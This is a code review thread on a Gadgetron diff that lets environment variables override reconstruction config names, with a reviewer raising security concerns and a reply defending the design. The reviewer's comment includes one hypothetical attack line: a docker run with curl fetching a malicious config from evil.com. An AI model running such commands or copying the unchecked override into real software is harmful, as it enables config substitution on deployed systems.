apps/gadgetron/connection/ConfigConnection.cpp

```diff
@@ -68,7 +68,14 @@ namespace {
         ) : ConfigHandler(callback), paths(paths) {}
 
         void handle(std::istream &stream, Gadgetron::Core::OutputChannel&) override {
-            boost::filesystem::path filename = paths.gadgetron_home / GADGETRON_CONFIG_PATH / read_filename_from_stream(stream);
+            auto recon_name = read_filename_from_stream(stream);
+
+            // Look up if there is an environment variable with that name
+            if (getenv(recon_name.c_str())) {
+                recon_name = std::string(getenv(recon_name.c_str()));
```

Comment:
My concern here around inheritance was that if for example someone made a dockerfile with:
`ENV default.xml=Generic_Cartesian_Grappa_Complex.xml`
or similar - because that "looks" almost like how you should set a default behavior, but would be very confusing for anyone who derives from that Docker image down the line. 

If the only usecase is "openrecon" (or another discrete set of possible ENV tags), we could always have a list of "allowed" matches. I may be paranoid, but I just worry about being able to:
`docker run gadgetron -e default.xml=/mnt/evil.xml` curl -o /mnt/evil.xml http://evil.com/evil.xml`
Especially if in a cluster or similar, where there might be a plaintext ENV configuration file that is passed by a helm chart and could get changed accidentally or on purpose

Reply:
As discussed in the meeting, I think this is intended behavior. It offers the possibility of overriding the meaning of certain recon names at deployment time, which is something one might need when the client code (e.g. scanner code) cannot be changed.